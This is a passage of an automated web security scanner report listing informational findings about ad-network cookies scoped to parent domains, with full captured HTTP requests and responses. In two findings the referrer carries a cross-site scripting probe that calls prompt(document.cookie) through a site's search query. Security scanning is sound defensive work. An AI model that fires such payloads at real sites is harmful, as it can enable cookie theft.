Set-Cookie: imp=a$le#1315313083617_171501150_ap3100_int|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:44:43 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close

GIF89a.............!.......,...........D..;

9.27. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...

9.28. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/15925-15.js?cb=0.7626287858001888&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:45:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^32; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69245; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3172566.js^2^1315313154^1315313154&638177.js^10^1315313154^1315313153&3218925.js^1^1315313153^1315313153; expires=Tue, 13-Sep-2011 12:45:54 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2081

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3172566"
...[SNIP]...

9.29. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/15925-2.js?cb=0.8956789178773761&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^1; csi2=638178.js^1^1315313134^1315313134&3172565.js^1^1315313133^1315313133; rdk=6348/9844; rdk15=0; ses15=9844^2; csi15=638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:52 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:50:52 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 13:50:52 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^3; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=68947; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3218923.js^1^1315313452^1315313452&3172565.js^2^1315313133^1315313452&638178.js^1^1315313134^1315313134; expires=Tue, 13-Sep-2011 12:50:52 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1829

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3218923"
...[SNIP]...

9.30. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/16043-15.js?cb=0.7354257416445762&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:53 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:45:53 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69246; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=638177.js^2^1315313132^1315313153; expires=Tue, 13-Sep-2011 12:45:53 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1843

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "638177" +
...[SNIP]...

9.31. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/16043-2.js?cb=0.6071016045752913&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6348/9844; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Tue, 06-Sep-2011 13:45:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69242; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3172565.js^2^1315313133^1315313157&638178.js^1^1315313134^1315313134; expires=Tue, 13-Sep-2011 12:45:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2069

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3172565"
...[SNIP]...

9.32. http://optimized-by.rubiconproject.com/a/dk.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x3068d5.js&size_id=2&account_id=6348&site_id=9844&size=728x90&cb=0.8285465578082949 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132; rdk=6348/9844; rdk2=0; ses2=9844^1; csi2=3172565.js^1^1315313133^1315313133

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Tue, 06-Sep-2011 13:45:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^26; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69240; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3142787.js^3^1315313158^1315313159&3142736.js^5^1315313158^1315313158&3147282.js^2^1315313158^1315313158&3218923.js^1^1315313158^1315313158&638178.js^5^1315313158^1315313157&3172565.js^2^1315313158^1315313158; expires=Tue, 13-Sep-2011 12:45:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1945

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3142787"
...[SNIP]...

9.33. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3018 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: act=1_1315103291; opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315309925_1315309925595:3279793012126635; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 11:52:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

9.34. http://pixel.quantserve.com/api/segments.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF0BHwHRB4EACa0QvYgQDRyEAQA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EL0BGAHSB7vRG9iBDYTREA; expires=Mon, 05-Dec-2011 12:55:20 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Tue, 06 Sep 2011 13:05:20 GMT
Content-Length: 39
Date: Tue, 06 Sep 2011 12:55:20 GMT
Server: QS

qc_results({"segments":[{"id":"D"}]});

9.35. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=2025226563;fpan=1;fpa=P0-1156348243-1315331724508;ns=0;url=http%3A%2F%2Fwww.myfitv.com%2Fsearch%3Futf8%3D%25E2%259C%2593%26query%3Dxss%25003d6ce%2527%253prompt(document.cookie)%2F%2F9336b0fa1c5;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315331724504;tzo=300;a=p-7elq8ZYievA_s;labels=myfitv HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EE4BHwHSB4EQCa0QvYgQDRyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EL0BGAHSB7vRG9iBDYTREA; expires=Mon, 05-Dec-2011 12:55:24 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 06 Sep 2011 12:55:24 GMT
Server: QS


9.36. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.957105.766755.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 12:44:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662
Date: Tue, 06 Sep 2011 12:44:52 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 12:44:52 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

9.37. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
